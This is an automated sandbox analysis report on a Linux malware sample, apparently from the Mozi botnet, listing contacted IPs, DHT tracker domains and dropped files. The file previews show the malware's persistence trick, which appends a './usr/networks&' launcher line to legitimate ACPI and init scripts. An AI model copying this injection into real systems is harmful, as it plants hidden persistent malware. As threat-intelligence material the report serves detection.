                                              35.133.83.246
                                              		unknownUnited States
                                              		20115CHARTER-20115USfalse
                                              121.225.157.134
                                              		unknownChina
                                              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                              167.108.60.4
                                              		unknownUruguay
                                              		6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                              22.169.86.166
                                              		unknownUnited States
                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                              176.51.203.237
                                              		unknownRussian Federation
                                              		12389ROSTELECOM-ASRUfalse
                                              18.172.254.74
                                              		unknownUnited States
                                              		3MIT-GATEWAYSUSfalse
                                              46.91.81.50
                                              		unknownGermany
                                              		3320DTAGInternetserviceprovideroperationsDEfalse
                                              185.70.34.103
                                              		unknownUnited Kingdom
                                              		201353NSUKGBtrue
                                              181.170.3.37
                                              		unknownArgentina
                                              		10318TelecomArgentinaSAARfalse
                                              137.177.179.233
                                              		unknownUnited States
                                              		11003PANDGUSfalse
                                              30.34.164.197
                                              		unknownUnited States
                                              		7922COMCAST-7922USfalse
                                              201.20.84.101
                                              		unknownBrazil
                                              		28598MobServicosdeTelecomunicacoesLtdaBRfalse
                                              46.237.138.113
                                              		unknownUnited Kingdom
                                              		29009UKBROADBAND-ASGBfalse
                                              63.224.11.107
                                              		unknownUnited States
                                              		209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                              170.30.9.222
                                              		unknownUnited States
                                              		23410NET-NASSAU-BOCESUSfalse
                                              114.142.138.74
                                              		unknownIndia
                                              		4721JCNJupiterTelecommunicationsCoLtdJPfalse
                                              214.148.23.237
                                              		unknownUnited States
                                              		721DNIC-ASBLK-00721-00726USfalse
                                              100.24.197.89
                                              		unknownUnited States
                                              		14618AMAZON-AESUSfalse
                                              163.11.57.89
                                              		unknownUnited States
                                              		600OARNET-ASUSfalse
                                              123.181.239.244
                                              		unknownChina
                                              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                              148.162.250.199
                                              		unknownUnited States
                                              		6400CompaniaDominicanadeTelefonosSADOtrue
                                              208.117.118.156
                                              		unknownUnited States
                                              		4181TDS-ASUSfalse
                                              193.1.110.180
                                              		unknownIreland
                                              		1213HEANETIEfalse
                                              5.207.217.166
                                              		unknownUkraine
                                              		21497UMC-ASUAfalse
                                              49.101.60.201
                                              		unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                                              45.18.240.57
                                              		unknownUnited States
                                              		7018ATT-INTERNET4USfalse
                                              31.239.241.25
                                              		unknownGermany
                                              		3320DTAGInternetserviceprovideroperationsDEfalse
                                              18.144.253.3
                                              		unknownUnited States
                                              		16509AMAZON-02USfalse
                                              87.179.7.128
                                              		unknownGermany
                                              		3320DTAGInternetserviceprovideroperationsDEfalse
                                              126.3.151.91
                                              		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                              46.72.244.174
                                              		unknownRussian Federation
                                              		12714TI-ASMoscowRussiaRUfalse
                                              117.202.65.25
                                              		unknownIndia
                                              		9829BSNL-NIBNationalInternetBackboneINfalse
                                              17.120.249.110
                                              		unknownUnited States
                                              		714APPLE-ENGINEERINGUSfalse
                                              174.64.181.99
                                              		unknownUnited States
                                              		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                                              166.95.72.65
                                              		unknownUnited States
                                              		3926FFX-CNTYUSfalse
                                              67.19.147.226
                                              		unknownUnited States
                                              		36351SOFTLAYERUSfalse
                                              163.81.198.169
                                              		unknownFrance
                                              		17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
                                              148.233.132.212
                                              		unknownMexico
                                              		8151UninetSAdeCVMXfalse
                                              195.13.205.115
                                              		unknownLatvia
                                              		12578APOLLO-ASLatviaLVfalse
                                              199.86.216.179
                                              		unknownUnited States
                                              		5006VOYANTUSfalse
                                              54.193.94.223
                                              		unknownUnited States
                                              		16509AMAZON-02USfalse
                                              214.89.182.196
                                              		unknownUnited States
                                              		721DNIC-ASBLK-00721-00726USfalse
                                              28.213.170.69
                                              		unknownUnited States
                                              		7922COMCAST-7922USfalse
                                              180.130.76.228
                                              		unknownChina
                                              		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                              13.8.174.247
                                              		unknownUnited States
                                              		26662XEROX-WVUSfalse
                                              118.61.155.193
                                              		unknownKorea Republic of
                                              		4766KIXS-AS-KRKoreaTelecomKRfalse
                                              91.166.162.40
                                              		unknownFrance
                                              		12322PROXADFRfalse
                                              130.94.25.120
                                              		unknownUnited States
                                              		2914NTT-COMMUNICATIONS-2914USfalse
                                              172.254.93.35
                                              		unknownUnited States
                                              		395095GHVHSUSfalse
                                              205.21.247.67
                                              		unknownUnited States
                                              		2914NTT-COMMUNICATIONS-2914USfalse
                                              16.250.227.156
                                              		unknownUnited States
                                              		unknownunknownfalse
                                              182.39.215.123
                                              		unknownChina
                                              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:336769
                                              Start date:06.01.2021
                                              Start time:19:30:38
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 7m 33s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:i
                                              Cookbook file name:defaultlinuxfilecookbook.jbs
                                              Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
                                              Detection:MAL
                                              Classification:mal100.spre.troj.evad.lin@0/221@4/0
                                              Warnings:
                                              Show All
                                              • Excluded IPs from analysis (whitelisted): 91.189.92.40, 91.189.92.41, 91.189.92.39, 91.189.92.38, 91.189.92.20, 91.189.92.19
                                              • TCP Packets have been reduced to 100
                                              • Created / dropped Files have been reduced to 100
                                              • Excluded domains from analysis (whitelisted): api.snapcraft.io
                                              • VT rate limit hit for: http://127.0.0.1:7574/UD/act?1


                                              Runtime Messages

                                              Command:/tmp/i
                                              Exit Code:0
                                              Exit Code Info:
                                              Killed:False
                                              Standard Output:

                                              Standard Error:telnetd: no process found
                                              utelnetd: no process found
                                              scfgmgr: no process found
                                              Unsupported ioctl: cmd=0xffffffff80045705
                                              Unsupported ioctl: cmd=0xffffffff80045705
                                              qemu: uncaught target signal 4 (Illegal instruction) - core dumped
                                              Unsupported ioctl: cmd=0xffffffff80045705
                                              /bin/sh: 1: cfgtool: not found
                                              /bin/sh: 1: cfgtool: not found
                                              Unsupported ioctl: cmd=0xffffffff80045705
                                              Unsupported ioctl: cmd=0xffffffff80045705

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              dht.transmissionbt.comPhoto.exeGet hashmaliciousBrowse
                                              • 87.98.162.88
                                              ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                              • 212.129.33.59
                                              new.exeGet hashmaliciousBrowse
                                              • 87.98.162.88
                                              popcorntime.apkGet hashmaliciousBrowse
                                              • 87.98.162.88
                                              router.bittorrent.comMozi.mGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              Photo.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              BitTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              3.4.5_41712.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              new.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              3.4.2 build 37754.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              download.ap.bittorrent.com/track/stable/endpoint/utorrent/os/windowsGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              .iGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              index.htmlGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              QsCC5s5NrR.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              BitTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              btweb_installer(1).exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              EBookCodec.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              popcorntime.apkGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              router.utorrent.comMozi.mGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              Photo.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              BitTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              3.4.5_41712.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              new.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              3.4.2 build 37754.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              download.ap.bittorrent.com/track/stable/endpoint/utorrent/os/windowsGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              .iGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              index.htmlGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              QsCC5s5NrR.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              BitTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              btweb_installer(1).exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              EBookCodec.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              iGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              bttracker.acc.umu.seMozi.mGet hashmaliciousBrowse
                                              • 130.239.18.159
                                              Photo.exeGet hashmaliciousBrowse
                                              • 130.239.18.159
                                              new.exeGet hashmaliciousBrowse
                                              • 130.239.18.159

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              THE-ISERV-COMPANYUSAstra.x86Get hashmaliciousBrowse
                                              • 208.236.7.86
                                              ipz.exeGet hashmaliciousBrowse
                                              • 208.225.151.221
                                              LGDACOMLGDACOMCorporationKRvrhiyc.exeGet hashmaliciousBrowse
                                              • 123.140.49.145
                                              ucrcdh.exeGet hashmaliciousBrowse
                                              • 123.140.49.145
                                              lrbwh.exeGet hashmaliciousBrowse
                                              • 123.140.49.145
                                              eqsfE2Td.exeGet hashmaliciousBrowse
                                              • 210.107.3.173
                                              czSwSRvr.exeGet hashmaliciousBrowse
                                              • 210.107.3.173
                                              bMGBqcBp.exeGet hashmaliciousBrowse
                                              • 210.107.3.173
                                              Delfino.exeGet hashmaliciousBrowse
                                              • 211.174.62.33
                                              Delfino.exeGet hashmaliciousBrowse
                                              • 211.174.62.33
                                              064-Q6ST.docGet hashmaliciousBrowse
                                              • 211.115.65.107
                                              Quote request from - Honeywell Safety Products.exeGet hashmaliciousBrowse
                                              • 121.254.178.252
                                              1vwiSWvK62.exeGet hashmaliciousBrowse
                                              • 121.254.178.252
                                              https://contentsxx.xsrv.jp/academia/parts_service/7xg/Get hashmaliciousBrowse
                                              • 115.94.207.99
                                              p.exeGet hashmaliciousBrowse
                                              • 210.124.23.21
                                              f.exeGet hashmaliciousBrowse
                                              • 210.124.23.21
                                              f.exeGet hashmaliciousBrowse
                                              • 210.124.23.21
                                              http://xn--9m1bk6jszgdzacu16mnvb3y2cyqg.com/bewuquid.phpGet hashmaliciousBrowse
                                              • 211.115.73.58
                                              KakaoTalk(PCver) Setup_default_30074_.exeGet hashmaliciousBrowse
                                              • 114.108.129.51
                                              am466VjPsQ.docGet hashmaliciousBrowse
                                              • 112.220.197.10
                                              dDRELyqiAv.docGet hashmaliciousBrowse
                                              • 112.220.197.10
                                              uNT7DNjADG.docGet hashmaliciousBrowse
                                              • 112.220.197.10
                                              COMCAST-7922USMozi.mGet hashmaliciousBrowse
                                              • 25.130.210.228
                                              svchost.exeGet hashmaliciousBrowse
                                              • 50.217.89.159
                                              utox.exeGet hashmaliciousBrowse
                                              • 73.74.102.47
                                              990109.exeGet hashmaliciousBrowse
                                              • 50.211.16.74
                                              sample4.dllGet hashmaliciousBrowse
                                              • 73.166.10.38
                                              sample2.dllGet hashmaliciousBrowse
                                              • 73.166.10.38
                                              New Doc 2020-12-21 09.53.07_8.docGet hashmaliciousBrowse
                                              • 67.170.250.203
                                              City Report - December.docGet hashmaliciousBrowse
                                              • 67.170.250.203
                                              https://moraniz.co.il/wp-content/ovFoPY4G24csbGENhcX9yJgYiF/Get hashmaliciousBrowse
                                              • 67.170.250.203
                                              MX4788618039IB.docGet hashmaliciousBrowse
                                              • 67.170.250.203
                                              DOCX9-29827.docGet hashmaliciousBrowse
                                              • 67.170.250.203
                                              HUNL5V-011220.docGet hashmaliciousBrowse
                                              • 73.55.128.120
                                              NormhjTcQb.exeGet hashmaliciousBrowse
                                              • 29.253.211.234
                                              fdwv4hWF1M.exeGet hashmaliciousBrowse
                                              • 28.151.127.230
                                              malware1.exeGet hashmaliciousBrowse
                                              • 66.176.78.84
                                              xJbFpiVs1lGet hashmaliciousBrowse
                                              • 76.122.42.96
                                              lnzn.dllGet hashmaliciousBrowse
                                              • 73.166.10.38
                                              Spisemuligheds4.exeGet hashmaliciousBrowse
                                              • 50.210.124.150
                                              bdOPjE89ck.dllGet hashmaliciousBrowse
                                              • 26.66.19.8
                                              SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                                              • 25.119.151.140
                                              REDIRISRedIRISAutonomousSystemESP16wyam724.exeGet hashmaliciousBrowse
                                              • 157.90.27.219
                                              hJl0ex32O5.exeGet hashmaliciousBrowse
                                              • 157.90.24.163
                                              FglzprMBm7.exeGet hashmaliciousBrowse
                                              • 157.90.24.163
                                              juice.exeGet hashmaliciousBrowse
                                              • 161.111.102.2
                                              HGhTHcjnCU.exeGet hashmaliciousBrowse
                                              • 161.111.154.55
                                              https://www.upo.es/investiga/visibilia/username/un/?l=_vbvjyffssgjjdd_Product&ssddsssdds=essentialenergy.com.au&sddsss=allison.cameron&data=02|01|allison.cameron@essentialenergy.com.au|8d4f2a8994f5446eb41b08d642afe287|76c58198c5744bd984c3598d38f5b8c7|0|0|636769720519852848&sdata=LNXdRRVWC5X7F51os5T4l61otsGjvu0MbIEw341zeSs=&reserved=0Get hashmaliciousBrowse
                                              • 193.147.188.22
                                              mssecsvr.exeGet hashmaliciousBrowse
                                              • 158.49.36.24
                                              3transcript.exeGet hashmaliciousBrowse
                                              • 193.145.204.167
                                              51Delivery_Notification_00121801.doc.wsfGet hashmaliciousBrowse
                                              • 157.88.155.62
                                              u1HIL1zquL.dllGet hashmaliciousBrowse
                                              • 155.54.22.153
                                              dan777.exeGet hashmaliciousBrowse
                                              • 193.144.40.26
                                              Anuncio importante.docGet hashmaliciousBrowse
                                              • 193.146.133.11
                                              mssecsvc.exeGet hashmaliciousBrowse
                                              • 147.114.119.31
                                              Anuncio importante.docGet hashmaliciousBrowse
                                              • 193.146.133.11
                                              J4FHoUySa7.dllGet hashmaliciousBrowse
                                              • 150.245.53.120
                                              EDC2sFzCKgGet hashmaliciousBrowse
                                              • 161.72.200.37
                                              02ca4397da55b3175aaa1ad2c99981e792f6615.exeGet hashmaliciousBrowse
                                              • 147.115.187.8

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              /etc/init.d/S95baby.shMozi.mGet hashmaliciousBrowse
                                                Mozi.mGet hashmaliciousBrowse
                                                  1skm346XtzGet hashmaliciousBrowse
                                                    Mozi.aGet hashmaliciousBrowse
                                                      Mozi.1.mGet hashmaliciousBrowse
                                                        6wuvHEBHt8.binGet hashmaliciousBrowse
                                                          7v1ic5IS8IGet hashmaliciousBrowse
                                                            Mozi.aGet hashmaliciousBrowse
                                                              Mozi.aGet hashmaliciousBrowse
                                                                Mozi.mGet hashmaliciousBrowse
                                                                  Mozi.mGet hashmaliciousBrowse
                                                                    Mozi.mGet hashmaliciousBrowse
                                                                      bad_fileGet hashmaliciousBrowse
                                                                        mxjzQQFgLpGet hashmaliciousBrowse
                                                                          JrAL1wW1MQGet hashmaliciousBrowse
                                                                            /etc/rcS.d/S95baby.shMozi.mGet hashmaliciousBrowse
                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                1skm346XtzGet hashmaliciousBrowse
                                                                                  Mozi.aGet hashmaliciousBrowse
                                                                                    Mozi.1.mGet hashmaliciousBrowse
                                                                                      6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                                        7v1ic5IS8IGet hashmaliciousBrowse
                                                                                          Mozi.aGet hashmaliciousBrowse
                                                                                            Mozi.aGet hashmaliciousBrowse
                                                                                              Mozi.mGet hashmaliciousBrowse
                                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                                  Mozi.mGet hashmaliciousBrowse
                                                                                                    bad_fileGet hashmaliciousBrowse
                                                                                                      mxjzQQFgLpGet hashmaliciousBrowse
                                                                                                        JrAL1wW1MQGet hashmaliciousBrowse

                                                                                                          Created / dropped Files

                                                                                                          /boot/grub/i386-pc/modinfo.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /etc/acpi/asus-keyboard-backlight.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):326
                                                                                                          Entropy (8bit):5.2904323771702915
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                                                          MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                                                          SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                                          SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                                          SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                                          Malicious:true
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                                          /etc/acpi/asus-wireless.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):157
                                                                                                          Entropy (8bit):4.412729940630044
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                                                          MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                                          SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                                          SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                                          SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                                          Malicious:true
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                                          /etc/acpi/ibm-wireless.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):636
                                                                                                          Entropy (8bit):4.722087767454589
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                                                          MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                                          SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                                          SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                                          SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                                          Malicious:true
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                                          /etc/acpi/powerbtn.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2079
                                                                                                          Entropy (8bit):4.778187000249208
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pDpMMOMTeMn/zV5rh/1RzUKH2Z8uBiXGp2fVU6GjJN+V4ATo+aZ+:pCgeCrhXHzDfVpmhC/
                                                                                                          MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                                          SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                                          SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                                          SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                                          Malicious:true
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                                          /etc/acpi/tosh-wireless.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):483
                                                                                                          Entropy (8bit):4.215331622973397
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                                                          MD5:07889D65619CDB80F8E876A087F160D3
                                                                                                          SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                                                          SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                                                          SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                                                          Malicious:true
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                                          /etc/acpi/undock.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):266
                                                                                                          Entropy (8bit):4.77497394042067
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                                                          MD5:5E3A15E41D35EC409613236A20B5783E
                                                                                                          SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                                                          SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                                                          SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                                                          Malicious:true
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                                          /etc/bash_completion.d/libreoffice.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):23
                                                                                                          Entropy (8bit):3.882045108136863
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:qXVOORgn:Tn
                                                                                                          MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                          SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                          SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                          SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                          Malicious:true
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: ./usr/networks&.exit 1.
                                                                                                          /etc/init.d/S95baby.sh
                                                                                                          Process:/tmp/i
                                                                                                          File Type:POSIX shell script, ASCII text executable
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25
                                                                                                          Entropy (8bit):3.8936606896881854
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:TKH4v0VJ:hK
                                                                                                          MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                          SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                          SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                          SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                          Malicious:true
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                          • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                          • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                          • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                          • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                          • Filename: bad_file, Detection: malicious, Browse
